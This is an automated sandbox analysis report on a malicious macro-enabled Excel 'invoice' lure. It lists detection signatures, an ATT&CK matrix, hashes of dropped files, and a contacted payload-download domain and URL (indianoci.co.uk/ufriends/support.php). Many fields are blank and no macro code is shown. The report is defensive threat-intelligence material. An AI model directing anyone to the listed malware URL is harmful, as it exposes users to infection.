Play interactive tourEdit tour
Analysis Report invoice_661434949_67552437.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
12% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
indianoci.co.uk | 172.67.189.4 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.189.4 | indianoci.co.uk | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385000 |
Start date: | 11.04.2021 |
Start time: | 00:16:02 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | invoice_661434949_67552437.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 31 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@3/10@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
172.67.189.4 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
indianoci.co.uk | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133926 |
Entropy (8bit): | 5.370325908538599 |
Encrypted: | false |
SSDEEP: | 1536:4cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:/VQ9DQW+zYXO8 |
MD5: | F6A5092BE9E143221D9DA187B89031EA |
SHA1: | DC0CFDABC3FF3BF9D2CAE81DC5DFE490B91BDABE |
SHA-256: | 8CE02001314F71667C5800F45F486B9222BB274972B541E59D5CF4B7B0D29FEA |
SHA-512: | 749633B47B754495E5BFB39C7691E2CCB210E54A2D3409AA58C42A30A31819BE34E91289457B69022717F5000C536928AA33B5D2DE74CBB1EA8195F619D8530D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 169558 |
Entropy (8bit): | 7.988183859518103 |
Encrypted: | false |
SSDEEP: | 3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs |
MD5: | 2A06BF86C977F9A29739FD65CE53B5BE |
SHA1: | 33C88641A06413C919903497577EEA54ED03FAA0 |
SHA-256: | 4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F |
SHA-512: | 71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.967209600318077 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD |
MD5: | 16321A0C2074BEA9227884ABA9971E30 |
SHA1: | 886A39B9C36D5BA00DEDA1BD30792635C73FA4B0 |
SHA-256: | 7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60 |
SHA-512: | 6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://indianoci.co.uk/ufriends/support.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184339 |
Entropy (8bit): | 7.96536778671128 |
Encrypted: | false |
SSDEEP: | 3072:gNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkz:gNrV4mnVqbTEnRMZ |
MD5: | 8580314383DFD8A39447DD3C93CA33BC |
SHA1: | BAFCC418D47D7E430FF47609B964F5A1BE3444CE |
SHA-256: | AAAA75B73BC2C8AA4DCBAF7D804998C1B1AB0E9B0883B550EF8613D17C4AB148 |
SHA-512: | C0D1DB87605D1ACF0EEFDAD8B92672AD961822819D5294DCB96E6ABA06B008EABA86DB54D0461A07283B30E3E0C5BE26734DAE8FCB1D7D6DCFADF81C8BA92619 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.630447272354785 |
Encrypted: | false |
SSDEEP: | 12:8XMmYXUhuElPCH2A4WYJuh8+WrjAZ/2bDaLC5Lu4t2Y+xIBjKZm:8XRK4uEAZiDD87aB6m |
MD5: | 829291B2038D409B9270168201F7E941 |
SHA1: | DB171763DC332EDB4FD1C3D72F4616E26D880320 |
SHA-256: | 6F1978A9D5009A5046FEEEFB34C0B15272724281E3D091842B0F1F975D143A75 |
SHA-512: | 6B7672A3C849E23191E9D0436BD807CC08EA52C6291E4CEDB8A773E2D1E429AD6ECA7DC70A2B48B56798553ABB75B95D4B0A87E95083178EF5E3D0B1E7C22EC6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148 |
Entropy (8bit): | 4.837648193517411 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWHnKb8W/g4dTSULE8W/g4dTSmxWHnKb8W/g4dTSv:dj0nKbNgQTpENgQTKnKbNgQTc |
MD5: | 0E1F08D229A4602AF5EEF4E92BABE78B |
SHA1: | 5BF6BE5FC7F62BF694A2AB180D0A2F3D30C4A91D |
SHA-256: | ED1F65A34CF8DF1B1EF2A4B5E3E6DFC5008EBF428F0B6AB5F333BC1B70A7B82E |
SHA-512: | 41C316D73CBF6499480436226DF3192394AF0D4DC53CBAA4E9C59AF7363DD27FE970E4C04B8176ED5333B7C021777B5D28B19E6BCB7B189B2D0DFD60129BBE14 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2280 |
Entropy (8bit): | 4.732266669477698 |
Encrypted: | false |
SSDEEP: | 48:8+eTwBB5aBwG5vB6p+eTwBB5aBwG5vB6:8d0BWBrBKd0BWBrB |
MD5: | 874ACF901353A710C040E3CD02659E57 |
SHA1: | 9AE90F147E97013FC045BE829756701F29962EB5 |
SHA-256: | 2702E0C79D524ED1DA7ECB6F2D80CC7E218957B0320CDF77DAB5ECC61668168F |
SHA-512: | 43994C67E28C42282D4E5688B0842DFF8827D72422BF11DC6653127748617C25DB95481F41F156EECCA0180CF0C0AF4D4F6D6CF9669E074EE379137862CC1010 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184330 |
Entropy (8bit): | 7.965430051359059 |
Encrypted: | false |
SSDEEP: | 3072:PNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkC:PNrV4mnVqbTEnRMU |
MD5: | 004C393BB1346D076AF52F46A4C8BCF1 |
SHA1: | A780758840385FAE166116047987157A7B5FF9F9 |
SHA-256: | 4B6B8F913401F4EE53D01D86D12844D6AB4AA77B27E3D120BB76B4BADB34D983 |
SHA-512: | A5B29DD8664B1B522865C1C6B6336626339A569A4E7DB362CCED6B950846D11B407345E988625B800E9C9A25B9842F3295069D3F2A04BFEEFCFE190E2D9801E2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 4318 |
Entropy (8bit): | 4.967209600318077 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD |
MD5: | 16321A0C2074BEA9227884ABA9971E30 |
SHA1: | 886A39B9C36D5BA00DEDA1BD30792635C73FA4B0 |
SHA-256: | 7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60 |
SHA-512: | 6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.965561623864126 |
TrID: |
|
File name: | invoice_661434949_67552437.xlsm |
File size: | 184803 |
MD5: | 64f33ccbc7976306417b2b2528daa5fe |
SHA1: | d71433580e83ab455556a88c483d1887e9641be6 |
SHA256: | 03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73 |
SHA512: | f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf |
SSDEEP: | 3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML |
File Content Preview: | PK..........!."..Z....f.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "invoice_661434949_67552437.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
